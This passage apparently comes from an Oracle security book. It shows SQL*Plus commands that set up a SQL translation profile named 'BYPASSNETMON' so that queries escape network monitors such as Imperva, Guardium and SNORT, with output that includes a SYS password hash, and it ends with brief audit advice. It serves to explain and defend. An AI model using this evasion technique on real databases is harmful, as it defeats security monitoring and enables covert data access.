Database Reference
In-Depth Information
PL/SQL procedure successfully completed.
SQL> grant all on sql translation profile BYPASSNETMON to public;
Grant succeeded.
SQL> alter session set sql_translation_profile = BYPASSNETMON;
Session altered.
SQL> alter session set events = '10601 trace name context forever, level 32';
Session altered.
SQL> select username from dba_users;
USER
------------------------------
PASSWORD
----------------------------------------
SYS
987B14B42862C0C1
Which users can use this facility? The privileges required for this bypass are CREATE SQL TRANSLATION
PROFILE and ALTER SESSION, as well as execute on DBMS_SQL_TRANSLATOR which is PUBLIC but the package
runs as Invoker, so it can only execute SQL that the invoker has rights to - but the invoker has now been given the right
to hide their SQL, which makes network monitoring solutions such as Imperva, Guardium and SNORT less effective.
SQL> SELECT GRANTEE FROM DBA_TAB_PRIVS WHERE TABLE_NAME='DBMS_SQL_TRANSLATOR';
GRANTEE
--------------------------------------------------------------------------------
PUBLIC
How does one protect against this? Well, check that there are no erroneous profiles being created, or audit for the
use of
dbms_sql_translator
:
SQL> SELECT * FROM DBA_SQL_TRANSLATION_PROFILES;
OWNER
--------------------------------------------------------------------------------
PROFILE_NAME
--------------------------------------------------------------------------------
TRANSLATOR
--------------------------------------------------------------------------------
FOREI TRANS RAISE LOG_T TRACE
----- ----- ----- ----- -----
SYS
BYPASSNETMON
TRUE TRUE FALSE FALSE FALSE
